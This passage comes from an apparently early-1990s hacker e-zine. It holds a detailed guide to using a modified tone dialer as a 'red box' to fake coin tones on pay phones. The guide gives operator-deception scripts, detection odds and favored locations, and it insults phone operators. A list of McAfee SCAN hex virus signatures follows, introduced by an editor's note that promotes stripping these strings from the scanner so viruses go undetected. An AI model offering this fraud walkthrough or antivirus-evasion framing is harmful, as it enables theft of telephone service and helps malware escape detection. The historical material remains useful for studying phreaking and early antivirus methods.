possible to simulate nickle and dime sounds, too, but the timings are      
different, and would require much more work for something that's really    
useless. Why use small coins when you can just use quarters?)  Please note 
that because of the tone shift caused by the crystal, the touch-tone keys  
will no longer work right...your box is no longer a pocket dialer. For     
those interested in keeping the dialing feature, try building the COMBO box
(red/white box), as detailed in text files and 2600 Magazine, Autumn 1992  
issue.                                                                     
                                                                           
For more information on red box theory, and for plans on how to build      
a "true" red box (this requires much more time, effort, and skill, and     
gives no benefit), check out other files on red boxes (RED.BOX, etc.).     
Also refer to Rock Steady's excellent article on red boxing in this issue. 
                                                                           
Rock Steady takes the "electronics" approach; being a novice at electronics
I elected to take the easy way and just modify the tone dialer.            
(Remembering what it's like to have no idea what the fuck you're doing, I  
wrote this file as explicitly as possible.  Forgive me if it seems *too*   
detailed for you.)                                                         
                                                                           
Placing Calls                                                              
~~~~~~~~~~~~~                                                              
To place a call with a red box, put the speaker on the tone dialer firm    
against the mouthpiece of the pay phone, making sure the black rubber ring 
on the back of the dialer fits snuggly against the mouthpiece, turn it on  
(you can verify that it's on by the LED in the upper-left), and press the  
priority (P) buttons as needed to generate quarter sounds. Details are     
given for the three types of phone calls: intra-LATA, inter-LATA, and      
international.                                                             
                                                                           
                                                                           
Intra-LATA (local)                                                         
~~~~~~~~~~~~~~~~~~                                                         
If you're in the same boat I am, you may not be able to box local calls.   
If this is the case, just dial the operator and explain to her how you need
to place call to wherever.  Usually she'll just ask for your quarter, but  
sometimes she'll ask why you don't do it yourself; in this case, you can   
either feign ignorance ("Ah, iz zhat so?  I ahm zorry, I ahm visiting from 
Germany unt zhere ve have to make khalz through zee operator.  Can you dial
it for me?") or feed her some story how the phone keeps swallowing your    
quarters or not recognizing them or something. When she asks for the       
quarter (or possibly more), give it to her...just press the "quarter" key  
however many times is needed, leaving a slight pause between each one to   
avoid suspicion (after all, no human can drop in a quarter per second).    
"Thank you, please hold.  CLICK.  RING..."                                 
                                                                           
The better, faster alternative, is to go through AT&T using an Equal Access
override code.  Simply dial 10288+1-NPA-NXX-XXXX (basically, you're using  
AT&T to place a call which would normally be placed via your local phone   
company).  Treat this just like an inter-LATA call (see below). Note that  
this will only work with AT&T (10288), as only AT&T is equiped to place    
long-distance calls from a pay phone.  (As a side note, AT&T charges you   
about $2.10 or so for a call which would normally cost only $0.25.  Kinda' 
funny...  Of course, with a red box, this doesn't matter.) Unfortunately,  
some pay phones block Equal Access codes; if this is the case, just go     
through the local operator (after all, the local telco has exclusive rights
to intra-LATA calls).                                                      
                                                                           
If you can box local calls, just deposit the virtual quarters after        
you dial the number, just like an inter-LATA call (see below).             
                                                                           
                                                                           
Inter-LATA (long-distance)                                                 
~~~~~~~~~~~~~~~~~~~~~~~~~~                                                 
Dial up the number, then wait for the ACTS voice or AT&T operator. "Please 
deposit two dollars and fifty-five cents for the first three minutes." Do  
as it says...hit the "one-dollar" key twice and then the "quarter" key     
three times (or whatever combination is required for your call). (When you 
get really fast, you'll find it faster to just use the "quarter" key       
exclusively.) "Thank you for using AT&T. You have twenty cents credit      
toward overtime..." That's all there is to it. If you do get an operator,  
keep cool, just keep putting in money but use the "quarter" key only, as   
some operators will get suspicious when you drop in $1.00 in quarters at   
perfectly regular intervals.  They almost always leave you alone.          
                                                                           
Every so-many minutes (usually three or five) a computer voice or a live   
operator will ask for more money.  Give it to her as outlined above.       
                                                                           
Sometimes after you hang up an operator will call the phone back           
immediately, demanding some money for overtime. You can either give it to  
her (with your box, of course), or "give it to her."  It's fun to chew out 
the Bell bitch when she can't do a thing about it...they just have to write
off the loss. (They threaten to bill the called party sometimes, but they  
can't legally do this; it's just an intimidation tactic.)                  
                                                                           
                                                                           
International                                                              
~~~~~~~~~~~~~                                                              
Dial 011, then the country code, then the area code, and finally the       
local number; press the pound key ("#") to signal the end of the number.   
Wait for the AT&T operator to come on (notice that all long-distance and   
international calls that are paid for with coins [as opposed to calling    
cards] are only handled by AT&T...really fair). Ask her to put your call   
through (she may verify the number), and yes, you are paying with coins.   
She'll say something like "Ok, your call will cost $6.50 [this is for      
Melbourne, Australia], but I can only take $3.00 at a time. Please insert  
the first three dollars now..." Be sure to use only the "quarter" key with 
live operators, as many international operators have recently been alerted 
to red boxing.  They are catching on, so be careful not to arouse their    
suspicion. When you "pay" three dollars (heheh) she'll say something like, 
"Ok, please wait," then you'll hear the connection going through and       
the "foreign" ringing. When someone answers she'll say something like      
"This is United States calling, please hold for an international call."    
If no one's home, you'll get your money back. Too bad none comes out...    
The person is then muted out, then she asks for the rest of the money.     
Give it to her. "Thank you, go ahead..." Every so-many minutes (usually    
one or two) a live operator will ask for more money. Give it to her as     
outlined above. (Note: regardless of what they may say, the operator tends 
to hang out on the line and listen in on you.  Do not tell the person how  
you're calling, as I'm sure that's how they once caught on. I'd also       
suggest keeping the conversation legal.)                                   
                                                                           
Sometimes after you hang up an operator will call the phone back           
immediately, demanding some money, just as with a long-distance call.      
See above for more details.                                                
                                                                           
                                                                           
Where Should I Call From?                                                  
~~~~~~~~~~~~~~~~~~~~~~~~~                                                  
To be brief, you can use your red box from any true pay phone (red         
boxes do not work on COCOTs [privately-owned pay phones]). Notice I say    
"can" and not "should;" some phones are definitely better than others.     
I've found that the best places to make calls from are government-owned    
buildings. Why? These are public places, there are always real pay phones  
there, and they are indoors, where it's warm in the winter and cool in the 
summer. The best phones are isolated and have a place for you to sit while 
you talk. I suggest you box from libraries, schools, municipal buildings,  
etc., but in my opinion, high schools are best. Why? They're open late     
for sports, etc. most days, even weekends, and you can blend in very easily
(if you're a teenager, you're a student; if you're older, your an older    
brother visting your old school; if you look old enough, you're a parent). 
Just go after school hours or it'll be noisy... Everyone has a favorite    
place, just look around and find yours.                                    
                                                                           
                                                                           
Will I Be Caught?                                                          
~~~~~~~~~~~~~~~~~                                                          
The following is an approximation of chances of being caught while using   
a red box (and dealing with a live operator). You can assume that you      
will never be caught when dealing with an electronic "operator" (ACTS).    
Again, these are only appoximations based on my experience. Remember,      
though, even if you are caught, nothing will happen to you; just hang up   
and try again.  If they threaten to call the police or anything, just take 
off, don't take any chances.                                               
                                                                           
Range           % Detected                                                 
~~~~~           ~~~~~~~~~~                                                 
Local           5% or less                                                 
Long-distance   25% or less                                                
International   75% or less                                                
                                                                           
                                                                           
Closing                                                                    
~~~~~~~                                                                    
I've found red boxing to be a great form of phreaking. There's no risk     
of being caught and you can call anywhere in the world for free -- all it  
takes is a $30 investment and the willingness to put up with the hassles.  
Plus, you get the added bonus of being able to laugh to yourself next time 
you see some chump actually putting real money in a pay phone (gasp!).     
                                                                           
Time to give credit where credit is due: I'd like to thank The Baron       
and Guido Sanchez for introducing me to red boxing, and GarbageHeap for    
telling me some of the tricks of the trade (come back to Chicago soon!).   
Also, some of the information in the Autumn 1992 issue of 2600 magazine and
in various text files (e.g. RED.BOX, etc.) has proved useful to me, and was
referenced in this article.  To everyone, your help is much appreciated.   
                                                                           
Well folks, get going, and have fun with your new toy!                     
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
SCAN v100 Virus Signitures                                                 
~~~~~~~~~~~~~~~~~~~~~~~~~~                                                 
                                                                           
The following is a list of all scan strings extracted from McAfee's Scan   
v100. Note: No self-mutating virus signitures can be automatically         
extracted from SCAN due to problems with wildcard searches. If you need the
signiture for a mutating virus not found on the list, please contact:      
        Screaming Radish@111:950/75 via 111:950/3.                         
                                                                           
[Note from Rock Steady: We have also included a file called MCAFEE.STR     
is the product of Screaming Radish from Australia , that removes Scan      
strings from any version of the AV program SCAN by McAfee.    We have a    
similar method for F-Prot, and F-Prot's VIRSTOP, which will be included in 
the next InfoJournal. Check it out -- are you surprised how dumb this      
programs is? Remember the first MtE scare? SCAN used *VIRUS STRINGS* on it!
HAHAHA...dummies! And they claimed a 99.9999% hit rate...bite me.]         
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                           
                                                                           
Scan ID    Virus Name      Hex Signature                                   
~~~~~~~~~  ~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
[WinVir]   WinVir          fc061e07be6e01bf8101                            
[Cf]       Coffee Shop     e03d0a03726cb8da33cd2180fca5                    
[Otto]     Otto            01a2ff0056b9600281c6                            
[J4J]      Jump4Joy        b8c7078bd889c1053936cd21                        
[I9]       Ice 9           bf100303feb099b971008a25                        
[Tab]      Tabulero        1e6a0003c32ea311002ea16c00                      
[Tab]      Tabulero        8c06cf00be9c0033c08ed8bf8f43                    
[Roc]      Rocko           8a865d02b93a022e30460045e2f9c3                  
[344]      344             8b9655028d9e2901b977003117                      
[Blj]      Bljec           8bc82d0001a3fa00030e                            
[Grnt]     Grunt           8b9657028d9e3001b9740031                        
[Cf1]      Coffee Shop 1   836f12728e47120e1fb92006f3                      
[K4]       KODE4           013b45017402ebef83c703                          
[OW]       384             be7002bf4b02b92500fcacaae2fc                    
[1014]     1014            83fbf07503e98b00b000                            
[104]      104             81c7030126803d06740a                            
[3Sht]     Triple Shot     bef11ab9e70cfdf3a5fc                            
[439]      439             8a84b301a20201e83d017413                        
[595]      595             fe873e008a973d0080fa01                          
[Abrx]     Abraxas         81ed060181fc4144740b                            
[Acd]      Acid            bb32018a273226060190882743                      
[Agn]      Agena           832e0200518b1e02002bdd                          
[Cpt]      Capital         81eb0c018db71f01b98803                          
[Cybr]     Cyber           8985a904a192002e8985ab04                        
[Cerb]     Cerburus        b86035cd21fc8bfb8d369502                        
[Chad]     Chad            01240a3c0a7526b80300                            
[Coa]      Coahuila        81ed30018db6f102bf0001b90300                    
[GTk]      Telekom         8a9c2f058dbc2001b90f04                          
[R715]     Rebo-715        bd04018b6e0081c5060183ed40                      
[Qo]       Quake-o         81ed07018db61e01b9d4012e8134                    
[Les]      Les             83ee038cc00510002e03                            
[Hi]       Hi              83ed0633c08ed8813e6401                          
[Fune]     Fune            83c6e9b90600fcf3a5ffe2                          
[Eof]      End-of          b80f03b104d3e8bbff0f03d839                      
[Fam]      Fam             fd0875f1f6de80e60132ed                          
[IOU]      IOU             019c0eb80335cd21891e8601                        
[IT]       IT              899ef8028c86fa02b41a8d96fc02                    
[Jeru]     Jeru            8b1e010181c3030183eb708b872300                  
[J26]      July 26         090189160b0152b41abae8fd                        
[P5220]    Pas-5220        8b3e6a008a85200030e431d2                        
[Ngs]      Nygus           8c9cfe028ed8b04e38068803                        
[S3d]      Silver 3d       b8931b50e8300259ff36c420                        
[PI]       PI              a11f013d0202740b8cc82d10                        
[NPX]      NPox 2.0        b8cdabcd2181fbcdab74640e                        
[NPX]      NPox 2.1        b8dcabcd2181fbdcab74640e                        
[Tim]      TimeMark        892656008cd32e891e54008ccb                      
[Rkm]      Reklama         f3b980008cc0408ec08cdb3bc37404                  
[Soy]      Soyun           e97c05cd218cc983c110                            
[SPh]      Swiss Phoenix   0726803eff04ff7501                              
[Wlk]      Walker          b8840050e92c07902e8c1eee07                      
[Mds]      Madismo         b85315ba72010500003b060200731a                  
[VM]       VM              81ff8d00750304084757cf                          
[7S]       7thSon          81ed0301be8b0103f5bf0001                        
[BUG]      Bogus           21b44febe8c35c2a2e2a00                          
[BUG]      Bogus           1fa113048bc8b106d3                              
[BUG]      Bogus           eb69900002100038000100                          
[kiri]     Hara            bef6fd3a83c1fd7431803e                          
[LZ2]      LZ2             fdbef80aebbc62e9c204000364e9                    
[LZ]       LZ              cdf1dae3629ae5f2febf48                          
[Fnz]      Fri13-nz        16070183c203cd217217b440b96f                    
[For]      Forger2         81ff78567507e9e900fe023714fc                    
[OW]       Yukon           b9970090ba0001cd21b457                          
[Stb]      Stealth         ff0e1304fac7064c00a700                          
[Msht]     Mugshot         8b1e1304b9060083eb0731                          
[Mon]      Monkey          b90002fc268a05342eaae2f8                        
[Arag]     Aragon          33c08ed8be137cb9a5018a3eba                      
[1554]     Ten_bytes       fe5a580306410383d2000306                        
[VTS]      VTS             071e26a12c000bc075                              
[BKil]     Boot Killer     33ffb90002f3a4ea1f000030061fb40d                
[NOP]      NOP             8bf4fba11304                                    
[Klr]      Kilroy          904b494c524f59                                  
[H-2]      H-2             eaa701c007444f53                                
[WM]       Windmill        13048b04488904                                  
[Curse]    Curse           fbb8c0078ed81eb8520050cbb840008ec0              
[Filler]   Filler          f7e32d00108ec0                                  
[MBug]     Music Bug       8cc88ed88ec08ed0bc00f0                          
[Iboot]    Israeli Boot    cd13b80202b90627ba0001                          
[Ghost]    Ghost           90ea59ec00f09090                                
[Mich]     Michaelangelo   a14e00a30c7ca113044848a3                        
[Stoned]   Stoned          ab004848a31304b106d3e0                          
[Emp]      Empire          ea9f01c007                                      
[Mardi]    Mardi Bros.     d88ed0bc00f0fbe827                              
[EDV]      EDV             751c80fe0175175b071f5883                        
[Alameda]  Yale/Alameda    b400cd13720db801                                
[Loa]      Loa Duong       fb8ed8fe0e1304a11304                            
[Teq]      Tequila         8ed3bc007cfb33ff832e13                          
[Micro]    Microbes        8ed0bc00f0fba113042d04                          
[A-Vir]    Anti-Tel        fb8ed8a1130448a3                                
[P-2]      Print Screen-2  7401bf0300b92000f3a4                            
[PrtScr]   Print Screen    cd05fec8a26001c36f6e2d                          
[Korea]    Korea           8ed0bcf0fffbbb1304                              
[Killer]   Disk Killer     c310e2f2c606f301ff90eb55                        
[Brain]    Pakistani Brain c30002e2f4a113042d07                            
[Form]     Form            e8b2005a5e1f33c050b8007c                        
[Ping]     Ping Pong - B   a1f581a3f57d8b36f981                            
[Tboot]    Typo Boot       241355aa                                        
[Flip]     Flip            fbb80300e81f0006b8                              
[Joshi]    Joshi           f3a48cc00520008ec0bb                            
[1253]     1253            e4cd1333db2e8a36207d2e8a                        
[Atx]      Anthrax         75ed061e071f32f6b9020033                        
[Invader]  Invader         8ed8a11304b106d3e08ed8                          
[Queen]    Queen's         8ed88ed0bc007c50fb33                            
[Invader]  Invader         b3ffb84342cd213d78567513072e                    
[Genb]     Generic Boot    fab8c0078ed8bf00                                
[OW]       Leper           baab03b43bcd21463b360d03                        
[OW]       V1-Not          b9ff00ba0000cd26b400cd16b80300cd10              
[OW]       8000            7504b000eb02b001a2a43c                          
[OW]       Lug             e8d90159b88c0650e8d10159b8c306                  
[OW]       Wake            bb3f01908a27903226080190                        
[OW]       Explode         8132f6ebd8b041e674ba40008edabb72                
[OW]       Dust            ba9e00cd21b440b93200ba0001                      
[OW]       Veng-B          8b1efc01b9fc008b16020283c262                    
[OW]       Veng-C          8b1e8602cd217246909090890e8802                  
[OW]       Veng-D          8b1eb302cd217246909090890eb502                  
[OW]       Veng-E          8b1e2703cd217303e9dd00890e2903                  
[OW]       Veng-F          8b1e390333c933d2cd211eb43f                      
[OW]       Scribble        ba6c03b43fcd21e82900                            
[OW]       Banana          b98b0090cd215a59b80157cd21b43ecd2159ba9e00      
[OW]       Leper           baab03b43bcd21463b360d03                        
[OW]       102             ba6001b92600cd21721eb441ba5301                  
[OW]       Blaze           b91c01cd21b43ecd21b44fba0001cd21                
[OW]       4915            bf3e040e5731c0509af90867                        
[OW]       Silver3b        f6b8030550e8eb0159e8a7000bc0740a                
[OW]       Secrets         3e01a006010ac0740b300743                        
[OW]       Seneca          81f9bc077e1beb0190b42a                          
[OW]       V1_1            891e70008c067200ba7400b41a                      
[OW]       V2_0            891e82008c068400ba8600b41a                      
[OW]       V1_0            891e5b008c065d00ba6500b41a                      
[OW]       Aids92          48002648616802212020                            
[BFD]      BFD             bb9201eb2133c0be007cfa                          
[Pnz]      Penza           b9bc02f3a4061fb82135cd                          
[Mgm]      Magnum          b9be092e00042ef6ad                              
[Plu]      Plutto          8b36010181ee00022e89360001                      
[Prm]      Prime           2b01b94402512ea00701                            
[Sui]      Suicide         81ed0701e80200eb41b9e803                        
[Ata]      Atas            b92b00b2aa8dbe6200fec23015                      
[Squ]      Squisher        ee11b844008ec0268a1db95401                      
[007]      007             2135a804020056051902280206                      
[132]      132             80f44b7549b8023dcd                              
[658]      Something       eb0e536f6d65746869                              
[Hck2]     Hacktic2        80c6108ec25256b426                              
[V9]       Virus9          890e6d01891671015b                              
[5856]     Bow             bec20903f3b94f002e                              
[vvf]      VVF-34          8b1e03004081ebda0089                            
[1280]     1280            ba0005cd21e8d500bf5004                          
[2136]     2136            81c45809fb3b26060073                            
[VDV]      VDV-853         8aa44f048dbc2001b92f0389                        
[Lam]      Lamer           87060e0050cc589d5826                            
[Alb]      Albanian        e80000bb4c03538bfc33f6                          
[SilW]     Silly Willy     be15008b1ab9d00881e973                          
[Con]      VCL             e800005d81ed06018db61403bf000157a5a4            
[Con]      VCL             e800005f83ef038d750de8                          
[Con]      VCL             e800005d81ed0601e8                              
[Dst3]     Dest3           8b2e010181ed1fffe8e7ffbc4e02                    
[DTR]      DTR             892624018cc88ed0bcf701                          
[Sk]       Sk              ee09b800008ed8893612030e1f                      
[Sk1]      Sk1             ee090e1f0e0789366f04fcbf                        
[500]      500             21813e7c021e03754db452cd21                      
[Ash]      Ash             81ed0b013ec6864702008db604                      
[C16]      Com16850        892e333cc7061d3cffffe81301                      
[Hpp]      Happy           8dbc190181c61201b9070090fc                      
[Lix]      LixoNuke        015e568bfe33c08ed8c41e4c                        
[1182]     Hellween 1182   014434803c00750c8b4401a3                        
[Tr2]      Troi Two        a384008c1e8600fbebb99c80fc                      
[Mch]      Mocha           bf0a01be96011e0e1fe8                            
[CV4]      CV4             8d77cabf0001b90500fcf3a4                        
[GK]       Geek            891ebb038c06bd03baa4                            
[557]      557             b8cdabcd213defcd7405e8                          
[Pia]      Piazzola        be6a04bf0001b4ddb900ff                          
[Rttl]     Rattle          81ed03018d9e20018d968b013e8a8e0301              
[Mex]      Mexican         8a8e03013bda7405300f43                          
[Egn]      Evil Genius     b8cd7bcd2181fbcd7b747f33db0e1f                  
[Slv]      Slovak          80bcfefc007406b8cb11                            
[Slv]      Slovak          268a1d32d82e881d041147e2f3c3                    
[Req]      REQ             01ba2a0003d78bdab41acd                          
[ZY]       ZY              8b0ecb0281c100012e890ecd02                      
[Why]      Why_win         bb01018a27bb02018a07                            
[fizzle]   DataFire        fdb419cd2188466de8e2fe                          
[Davis]    Davis           b9a706fcacc0c8042e3206a706                      
[Cha]      Chang           c3fa0e1f33c08ec0bf0c00a1                        
[VA]       VA              b963068cc88ed8bf0000b8609f                      
[Gre]      Green           8986160433ffc7454a0000                          
[1030]     1030            8ec033db26891fb880                              
[Chs]      Chaser          8a160900bb38008a0732c2                          
[RMIT]     RMIT            f6e88b000bc0740ae851                            
[1661]     1661            fa8bece800005e81ee9a012ef684                    
[Ptch]     Pitch           ba220083c202061fb84725                          
[Mls]      Malaise         81eb970483eb038cc82e                            
[Blus]     Bloodlust       be5d018bfeb92e01b37f                            
[Trk]      Turkey          81eb29012ef687220101740f                        
[417]      OMT             b9890180352a47e2fa                              
[Topo]     Topo            fa0633c08ec0b82b002687060c00508cc8              
[Ant]      ANT             8a260701eb1290ac32c4aae2fa                      
[702]      702             5e3dc707751133c08bd88bcb                        
[205]      205             81eec900b44ebabf00                              
[1835]     1835            be9c0781ee030101de8904be9e07                    
[Krv]      Krivmous        c43e07010657c43e0b010657ff                      
[Lan]      Lanc5476        8000179e83da00739581eb8b                        
[Lan]      Lanc5882        80118b1e3a04c82ef726e904                        
[Lan]      Lanc            9a0e02f000b8f401509a9e025e                      
[PA]       PA-5792         3ec300417407803ec30042754a                      
[Cas]      Casc1621        81eb070183bf010100740e8db7                      
[Sti2]     Stink2          890e7801c6062d0101e8ab00                        
[Timid]    Timid305        ba48ffc70655ff2400b409cd                        
[Tmd]      Timid           e80000832efcff09ba2a                            
[Eno]      Enola           81fb91197503e91101b452                          
[Crk]      Cracky          83ee0956fcbf0001b90500                          
[Mum]      Mummy           04062e8c0665002e8c                              
[Che]      Cheeba          8035264781ff6807                                
[Nina]     Nina            b90001f3a42d100050b8370150cb                    
[Dot]      Dot Killer      feb9400057f3a458ffe0be0001                      
[Sta]      Stahl Platte    b90001f3a48ec01ee9b101                          
[Er]       Error           80fcdd7426b82135                                
[Sat14]    Saturday        3e720201740c0106900083                          
[E92]      Europe 92       83c62dbf000157a5a5c3                            
[Hre]      Here            1eb8f000508becff5e0058                          
[Sdot]     Star Dot        b44fcd2173e5ff0641038cc8                        
[789]      Dot-789         8ec0268b1e6c04891e6604                          
[Tum2]     Tumen V2.0      e813feb4ffcd213d000074                          
[Key]      Keypress        fa2b06920383da00a39803a3                        
[T12]      Thursday 12th   8a26290132260001be0301                          
[1992]     1992            d8b9a006bf03002ea0                              
[1992B]    1992B           2e8c0601008cc88ed8bf0300                        
[Mule]     Mule            2e8a262f0e3e302743e2fa                          
[T3]       Taiwan3         b8404bcd213d78567512                            
[T4]       Taiwan4         b8504bcd213d34127510                            
[Fu]       Fu Manchu       b4e1cd2180fce1731680                            
[DAME]     DAME            be762d81f699548bdebec690                        
[DAME]     DAME            bbbaf4be84a78acb80e11f                          
[DAME]     DAME            b82846bab38df7ea2d3e21                          
[DAME]     DAME            bebaf4bb72c52b9c4810b106                        
[CMDR]     Commander       33e4fbe87400                                    
[Bmb]      Bomber          bb4d0830071e2bf68ede                            
[Boo]      Boojum          d8bb1700291e030029                              
[928]      928             bf000157be2b03b90300                            
[Mog]      Mog             bf0001fcffe7b40e                                
[880]      880             bb36008a0732c288                                
[Hrs]      Horse           cd200a0d4f4b                                    
[334]      334             81ee0b01e80900e8                                
[Shld]     Shield          8d0e2f0e2bcafcac                                
[2623]     2623            b8ab9ccd2f3d76                                  
[LK]       LK              bf000189fe83eef0ff                              
[Em]       Emmie           21c646950081f9bc                                
[Bt]       Beast           8bf283c619bf0001b90300                          
[Qk]       Quake           81fbba00744c891e                                
[981]      981             213d51907455be02                                
[1339]     Mummy           01065c04b84242cd                                
[Ill]      Ill             ea2033ff3e8a86                                  
[ZMT]      ZMT             01b9fc00f3a4b8000159                            
[MPC]      MPC             a503b9140033f633c0                              
[Gls]      Gliss           83bcdf04017402cd20                              
[Anto]     Anto            d87234b43fba7ffdcd                              
[Kzm]      Kuzmitch        b915038a5466309051                              
[Pch]      Peach           53e8800050f3a6741e                              
[Imp]      Imp             213d71197503e9bb00                              
[Sqk]      Squawk          81bc30034d5a742e                                
[Troi]     Troi            b4fccd213ca57428                                
[Shd]      Shield          b9afb560b5b3a5                                  
[Mnc]      Munich          8d2614078cd903                                  
[Emf]      EMF             83ea03b99301cd21                                
[Bst]      Busted          0732060601880743                                
[Mut]      Mutating        e82b004665617220                                
[Mut]      Mutating        04d3ea83ea108cd903caba6d                        
[RusD]     Russian         04d3ea83ea108cd903caba56                        
[914]      V914            04bbde03b97f0058                                
[Bwr]      Beware          8102578bd6fcb903                                
[1308]     1308            9047e2f8a97e39c3                                
[Sadt]     Sadist          89261c008cc8fa8e                                
[DMB]      DM-B            bf00018bc7                                      
[Crp]      Creeper         b8ff43cd218cd82d11                              
[1376]     Hellween        81ee58015650060e                                
[Bob]      Bob             81f9c907720680                                  
[HS]       HS              b8874bcd213d636675                              
[MFC]      Mface           3c75062ec6878a01                                
[DOD]      DoDo            80fcab7502eb31b8                                
[DD]       Dada            0e27062e891e2906                                
[Sr]       Scream          d8ff0e1304c51e8400                              
[Mlg]      Malaga          01a2ca07a2db07a2                                
[K]        Micropox        1ffd720db8f3c1cd                                
[JD]       JD              a45f57b82135cd2181                              
[CKs]      CKsum           129c9d03079c4343e2                              
[109]      109             a4ba00feb41acd21ba67                            
[P45]      P-45            b44eba270131c9cd2172                            
[Qt]       Quiet           8cc801060c01ff1e0a                              
[Sh]       Sh              1e650353e819005bb9                              
[Bry]      Brainy          e800005e56fa83c61b90                            
[CV]       C               4d414effffba                                    
[Crm]      Criminal        fc11742680fc12742180                            
[Hng]      Hungarian       c30eb000fad50a8807                              
[A16]      August16        ba790203d7b41acd                                
[D-T]      D-Tiny          07aba5b82125cd2107                              
[Def]      Define          013dba9e00cd2193                                
[Mar]      Marauder        5e81ee0e01e80500                                
[487]      487             f3bf0e0c0e579a16                                
[Psc]      Psycho          ba1603cd21726fb8                                
[Mn]       Mannequin       813e670456441f75                                
[Dmo]      Demolition      8d77178a04d0e0                                  
[HW]       Halloween       b8b8009a44025701                                
[1244]     1244            b4e0fccd2180fc0375                              
[730]      Ontario         b86e4bcd213d545675                              
[Sov]      Sov             5b0eb90001511e06b1                              
[1186]     Lib1172         5351bb12018b0f1e5b03                            
[Rag]      Rage            ea83c5419055eb0d50                              
[El]       Eliza           43b42acd2180fa0d75                              
[Bet]      Beta            8bfeac32c4aae2fa                                
[472]      ASP-472         d8bb980001d38b0f                                
[Plov]     Plov            12b42ccd2180fa327c                              
[QML]      QMU             ed78060e1f0e07bf                                
[M11]      MPS1.1          8b84d301408984d3                                
[D10]      Day10           f347ba5448263915                                
[Tn]       Tony            b8b70050cb546f6e79                              
[JK]       Joke            894e4972eab801438d                              
[SX]       SX              e70108fe0ee701be                                
[Bro]      Brothers        fc1e7c0fb413cd2f                                
[Sti]      Stink           1f890f894f026107                                
[KU]       KU-448          e7fe0fbe2c0190b9                                
[HrB]      Hero-394        2e8384670310061e                                
[Hary]     Hary            bb3e0281eb2a018b                                
[Sqe]      Squeaker        fbe9b3feb000b4                                  
[MPS]      MPS 3.1         80f4a78865289047                                
[370]      370-B           213d55557503eb5b                                
[V-5]      V-5             1620022e891600018a                              
[802]      PC Flu          e81f001febfefa                                  
[M-123]    Multi           8b44f4a300018a44                                
[Gr]       Grapje          f8b44732d28d36d901                              
[SCT]      SCT             b40eb202cd218cc8                                
[Barc]     Barcelona       b44a0e07cd21fcb80000                            
[LCV]      LCV             a4c31e071e8e1e260133                            
[1452]     1452            52e80602722ee891                                
[621]      621             81f9d0077503e9d2                                
[CRF]      CRF             81ed0b01c6863d02                                
[RST]      Reset           1fe800005d8daeaf                                
[Ph]       PathHunt        81ed1405c3bb0501e8                              
[1701]     1701            81eb3101f6872a01                                
[408]      408             2e03015b53c33d4b                                
[Set]      Semtex          8bf581c681028bfbb907                            
[Ws]       Wordswap        fc40741b3d4230750c                              
[GY]       Got-you         8bf82eff2eb000cd                                
[D2]       DIR-2           04ffbb6000b44ae8                                
[Ein]      Einstein        8b1647008e1e4500b800                            
[Nbk]      Nobock          f88bef7451bb0001                                
[Jrk]      Jerk            e8f502e877009d5dbd00015533ed                    
[M128]     M-128           8ec0bf0303b17df3a4                              
[Boys]     Boys            ebd85b5383c307c607                              
[BT]       BackTime        e800005bbf00018db7                              
[Tokyo]    Tokyo           8ed0bc8c01fbb462                                
[Spain]    Spanish         e9fbfde9250b06570e07bf                          
[748]      748             8ed8813eac014642750881                          
[Spz]      Spanz           e800005e81ee0f018d                              
[Mant]     Manta           e814008aa42f058dbc20                            
[Twin]     Twin-351        b810ffcd213c077507e8                            
[Hitc]     Hitchcock       b430cd213c02720ab8fe4b                          
[Mosq]     Mosquito        b8080050eb055890eb3e                            
[ETC]      ETC             e91c02eb05e9d400908b16                          
[Kla]      Klaeren         5b81ebaf03b9a5038037                            
[D28]      Spanish April Fool 8ed08b261400fbc6063e                         
[CRJ]      Cracker         3a5222110a061945384129                          
[Bgh]      Burghofer       cd215b488ec0fa26c70601                          
[Dei]      Deicide         b95000ba0000cd26                                
[268P]     V270x           8ec10650be00015631ff                            
[1067]     1067            cd218a4403a202018a44                            
[337]      337             8c4402b425ba6001cd21                            
[WWT]      WWT             b44eb90100cd217302eb                            
[PCV]      PCV             b94f072e8a9708002e0010                          
[2559]     2559            ed07eb0190eb0190eb0190                          
[Drp]      Dropper         8bcdf3aa33edad91ad920a16                        
[Aust]     Australian      b87d4bcd213d545675                              
[144]      AT144           8bfee800005e83c631a4                            
[Kiev]     Kiev            8be9e800005b538b87                              
[733]      733             8b43018f06b95eff8f                              
[LC]       Love Child      f7b603fec5ebf14c6f76                            
[BB]       Bad Boy         2eff3627010e1f2eff262501                        
[PS10]     PrtSc           d8a113042d0200a31304061f                        
[1963]     1963            e8bb068ec033ff33c0af                            
[Grb]      Growing Block   eb83c3202e8e068500b44a                          
[Raub]     Raubkopi        fb8cc88ec0e804fbba3f01b4                        
[Z900]     ZK900           ea83c2042bdab44a8cc1418e                        
[BCV]      Sentinel        e583ec128c5ef455e816fe                          
[Spar]     Sparse          b8554bcd213d31127476b821                        
[Svir]     SVir            e82a0133c98a2e1a00e30dfe                        
[TV]       Tester          f3a4b409ba0301cd21baa1                          
[Staf]     Staf            e881ffb80030cd213dd207                          
[MX2]      Mix2            e83500e81b00ba0000b9e808                        
[453]      RPVS            8cc88ed8be01012e8b0405                          
[Guppy]    Guppy           8bd8cd21899c95008c84                            
[Crazy]    Eddie           8b46043bc374143d7000                            
[Ar]       834             e8ac02e87101e89e01e85502                        
[V299]     V-299           b80042cd21721a33d22e8b                          
[Pht]      Phantom         ea000183ee0603d6e8c8                            
[Lazy]     Lazy            b800008ec026a142002d                            
[Sylvia]   Sylvia          ebf781f9a3467503eb                              
[905]      905             f1cd2181fa0e0e7459ba                            
[Plg]      Plague          c3bb34018a27322606                              
[T133]     Tiny 133        a58ec1939191268785e0                            
[Pt]       Patient         b9b4052ea00a01bf2c012e803e09                    
[Hyb]      Hybrid          ea007497ab2780885d18d4                          
[LPC]      Pieces          ee3c00b82135cd212bdb26                          
[Sdm]      Saddam          a11304bb4000f7e32d67                            
[MG]       MG              a4c43e0600b0ea49f2ae                            
[S143]     Swiss 143       d6cd21803c5074178bd7e8                          
[Label]    Label           bf4c005733ed8eddc4                              
[HNY]      Happy N.Y.      e8f90373358dbcfc012e                            
[T133]     Tiny 133        bb2f06b950008bfed374                            
[Jus]      Justice         5b83eb592e89474d2e894f4e                        
[Hymn]     Hymn            5e83ee4cfc2e81bc4207                            
